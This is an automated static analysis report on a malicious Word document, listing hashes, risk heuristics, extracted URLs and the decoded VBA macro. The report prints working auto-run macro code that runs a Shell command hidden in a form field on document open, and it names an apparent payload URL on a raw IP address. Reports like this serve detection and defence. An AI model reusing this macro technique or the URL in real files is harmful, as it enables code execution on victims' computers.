Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2e35df4e3b4317c…

MALICIOUS

Office (OLE)

98.5 KB Created: 2019-06-12 03:55:00 Authoring application: Microsoft Office Word First seen: 2021-04-10
MD5: 5a525d65cd6e60dfb2036cf9fc3846a1 SHA-1: b12349b8ff71a5d53daf2d2cd4d9c250fb06ea57 SHA-256: b2e35df4e3b4317cbc35001897c6cd53d428416b03639bb65933e3ce1f160fa2
90 Risk Score

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell Replace(UserForm1.TextBox1.Text, "11:11", time)
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://185.140.248.17/ltm2 In document text (OLE body)
    • http://tl.symcd.com0&In document text (OLE body)
    • http://t2.symcb.com0In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://tl.symcb.com/tl.crl0In document text (OLE body)
    • https://www.thawte.com/cps0/In document text (OLE body)
    • https://www.thawte.com/repository0WIn document text (OLE body)
    • http://tl.symcb.com/tl.crt0In document text (OLE body)
    • http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 SignedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
vba-macro oletools.olevba.extract_macros (decoded VBA source) 780 bytes
SHA-256: a836ea473d445427a79389a6fdb35f2e38ef92135db052e251a3da0d98a25dc7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
Dim time
time = Format(Now + TimeSerial(0, 0, 37), "hh:mm")


Shell Replace(UserForm1.TextBox1.Text, "11:11", time)
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{70C69FD8-4EF6-4C83-BFA3-3B24E85F372A}{032B2DC5-FA15-4CCA-BEEF-FE98303EEAC3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False